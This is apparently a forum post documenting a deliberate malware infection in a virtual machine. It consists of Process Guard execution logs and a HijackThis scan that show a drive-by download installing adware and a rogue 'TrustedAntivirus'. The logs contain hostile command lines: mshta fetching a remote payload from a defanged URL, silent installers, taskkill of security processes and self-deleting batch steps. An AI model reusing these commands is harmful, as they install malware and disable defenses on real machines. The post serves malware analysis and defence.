Thu 06 - 22:45:37 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [2372]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe child ]
Thu 06 - 22:45:50 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winavp.php ]
Thu 06 - 22:45:57 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:46:09 [EXECUTION] "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3452]
[EXECUTION] Commandline - [ "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" /regserver ]
Thu 06 - 22:46:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:26 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:30 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:37 [EXECUTION] "c:\windows\system32\ax9\np89104.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ax9\np89104.exe ]
Thu 06 - 22:46:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [1400]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3932]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:47 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:51 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:46:55 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:46:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:01 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:04 [EXECUTION] "c:\windows\system32\bv2\renabcom4.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\bv2\renabcom4.exe ]
Thu 06 - 22:47:05 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]
Thu 06 - 22:47:09 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:13 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3932]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:16 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:47:20 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:26 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3616]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:48:01 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [3368]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:04 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2320]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:06 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3500]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:12 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:48:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3492]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:48:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\cmdinst.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [3772]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\cmdinst.exe /verysilent ]
Thu 06 - 22:48:25 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:48:28 [EXECUTION] "c:\windows\17pholmes1000106.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ "c:\windows\17pholmes1000106.exe" 61a847b5bbf72813329b385772ff01f0b3e35b6638993f4661aa4ebd86d67c56389b284534f310 ]
Thu 06 - 22:48:30 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3508]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:48:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:48:44 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:48:55 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:48:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2800]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:49:05 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\cmdinst.exe" [3080]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" /sl4 $190236 "c:\docume~1\kly\locals~1\temp\cmdinst.exe" 542512 52224 /verysilent ]
Thu 06 - 22:49:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:49:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:49:22 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3420]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:25 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:49:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:49:31 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3636]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:49:35 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" [3392]
[EXECUTION] Commandline - [ "c:\windows\s0xz\command.exe" /install ]
Thu 06 - 22:49:40 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:45 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:47 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3268]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:49:49 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3284]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:49:52 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3392]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" qi ]
Thu 06 - 22:49:54 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\s0xz\command.exe ]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\virtual machine additions\vmusrvc.exe [368]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\pgaccount.exe [508]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\ethereal\ethereal.exe [1236]
Thu 06 - 22:49:56 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2180]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:50:00 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" service ]
Thu 06 - 22:50:02 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:50:04 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:50:11 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [2152]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:50:14 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2780]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 22:50:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [2244]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:50:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2244]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:50:47 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3652]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:51:45 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [572]
[EXECUTION] Commandline - [ taskmgr.exe ]
Thu 06 - 22:54:44 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:54:46 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2772]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]

At this point my VM froze, so the Process Guard log stops here and resumes after a reboot.
IPB Image

After reboot ...
QUOTE
---Process Guard Log Started---

Thu 06 - 22:58:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:58:48 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1956]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:01:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" [1832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus ]
Thu 06 - 23:01:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" [1744]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\~uavsetup.exe /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:29 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" [1228]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" /sl4 $60136 "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" 15424389 52224 /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" /inireplace ga6plicense.ini ]
Thu 06 - 23:01:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\winav.xml" "[name]" "trustedantivirus" ]
Thu 06 - 23:01:52 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im pgs.exe ]
Thu 06 - 23:01:55 [EXECUTION] "c:\windows\system32\wbem\wmiprvse.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ c:\windows\system32\wbem\wmiprvse.exe -embedding ]
Thu 06 - 23:01:58 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im fwsvc.exe ]
Thu 06 - 23:02:02 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im uga6pcw.exe ]
Thu 06 - 23:02:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:17 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:29 [EXECUTION] "c:\program files\trustedantivirus\activate.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\activate.exe" /"trustedantivirus" ]
Thu 06 - 23:02:31 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp blpatch trustedantivirus hxxp://trustedantivirus.com/ "c:\program files\trustedantivirus\dat\bnlink.dat" ]
Thu 06 - 23:02:32 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp sr ?action=23&abbr=uga6p_{pcid}_362.2&pc_id={computer_id}&gai={gai}&gli={gli}&gff={gff}&cnt={cnt}&lng={lng}&lp={lp}&addt={addt} hxxp://ykeeper.trustedantivirus.com/ hxxp://trustedantivirus.com/ trustedantivirus ]
Thu 06 - 23:02:34 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -domain hxxp://trustedantivirus.com ]
Thu 06 - 23:02:36 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -install ]
Thu 06 - 23:02:37 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -start ]
Thu 06 - 23:02:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:42 [EXECUTION] "c:\program files\common files\trustedantivirus\bm.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\bm.exe" dm=hxxp://trustedantivirus.com ad=hxxp://trustedantivirus.com sd=hxxp://ykeeper.trustedantivirus.com ]
Thu 06 - 23:02:44 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /quickscan ]
Thu 06 - 23:02:56 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 23:02:58 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1240]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:03:06 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]

On top of the pile of junk, the drive-by also installed an unsolicited "antivirus" (TrustedAntivirus) that I never asked for. It then, of course, "detects" part of what the same infection had just installed.
IPB Image
IPB Image
IPB Image
QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:37:58 PM, on 3/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\S0xZ\command.exe
C:\WINDOWS\mrofinu1000106.exe
C:\Program Files\Network Monitor\netmon.exe
C:\Program Files\Common Files\TrustedAntivirus\ugac.exe
C:\Program Files\Common Files\TrustedAntivirus\bm.exe
C:\Program Files\TrustedAntivirus\pgs.exe

O2 - BHO: (no name) - {0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD} - C:\Program Files\Internet Explorer\xabe89104.dll
O2 - BHO: (no name) - {22342B44-5B98-4B30-9D53-C182AD8DF217} - C:\WINDOWS\system32\fccbbya.dll
O2 - BHO: CIEIntegrator Object - {5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E} - C:\Program Files\TrustedAntivirus\Tools\pblock.dll
O2 - BHO: IEFW Object - {6F87F145-DC2D-4766-AF03-3A3B96FFAD98} - C:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
